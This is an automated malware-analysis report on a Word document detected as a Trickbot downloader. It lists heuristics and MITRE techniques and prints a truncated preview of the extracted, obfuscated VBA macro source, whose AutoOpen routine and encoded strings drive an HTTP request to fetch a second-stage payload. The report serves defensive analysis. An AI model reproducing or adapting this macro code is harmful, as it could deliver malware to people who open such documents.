MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with a signature indicating Trickbot. The presence of VBA macros, specifically an AutoOpen macro and CreateObject calls, strongly suggests malicious intent. The script attempts to download a second-stage payload by making HTTP requests to URLs constructed from obfuscated strings, which is a common Trickbot behavior.
Heuristics 8
-
ClamAV: Doc.Downloader.Trickbot-6444938-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Trickbot-6444938-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10920 bytes |
SHA-256: 0f12976257708a2ed19d0fa6ad0bfd3076c48bcfa1302b20faa5a975ec0022f0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
t2201953
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
End Sub
Attribute VB_Name = "aliciamp3"
Function polojester()
polojester = "9E58|E697E5''Rhl5|Eunu"
End Function
Function llehangn()
llehangn = veotsirH.nekukufu
End Function
Function racing1965()
Set naryejec = CreateObject(UserForm1.TextBox3)
naryejec.Open UserForm1.TextBox2, abctrident(dylan2001), False
naryejec.send
If naryejec.Status <> 200 Then
naryejec.Open UserForm1.TextBox2, abctrident(goblue01), False
naryejec.send
Else
End If
daxdizpa naryejec
September1667
End Function
Attribute VB_Name = "AVODOROBELH"
Attribute VB_Base = "0{0A3FCBC7-A2A5-474F-A060-56F30A6DA1D4}{0111BA67-243D-4682-85BE-FF9E394FEFD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub
Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub
Private Sub jupiter500_Change()
Set torontolee = CreateObject(deedflut)
esreeves = 97 * 10
esreeves = 74 * 9
esreeves = 81 + 10
esreeves = 67 + 13
esreeves = 40 + 18 + 7
esreeves = 59 - 100 - 8
wade1673 torontolee
End Sub
Private Sub Label1_Click()
MsgBox "Ok"
End Sub
Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub
Attribute VB_Name = "AVOHITLOB"
Attribute VB_Base = "0{6A9586A8-94BA-4473-ADB7-5E30387A65BA}{2557F000-7316-4D63-A3AA-25A41BB94DB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "broiddor"
Function heagrace()
heagrace = AVODOROBELH.Search11
End Function
Sub t2201953()
Randomize
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
veotsirH.zebrastart = "tetteris"
End Sub
Attribute VB_Name = "elsieroger"
Function abctrident(vokrabuhC)
wreckkha = ""
jokerhack = Len(vokrabuhC)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
For billfool = 1 To jokerhack
wreckkha = wreckkha + punkin198(sleekrel(vokrabuhC, billfool), 4)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
Next billfool
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
abctrident = wreckkha
End Function
Function deedflut()
deedflut = sunlibrary
End Function
Function sunlibrary()
sunlibrary = abctrident(ukayobkas.shoorbaa)
End Function
Attribute VB_Name = "evathrac"
Function open0318(ncccrapp, hootiebasf)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
open0318 = abctrident(AVODOROBELH.stalshaf) + ncccrapp + abctrident(AVOHITLOB.abcd2345) + _
hootiebasf + abctrident(AVODOROBELH.musicjoe + AVODOROBELH.blackberry) + hootiebasf
End Function
Attribute VB_Name = "fionachip"
Function christyaaa(pantyman)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
ch
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.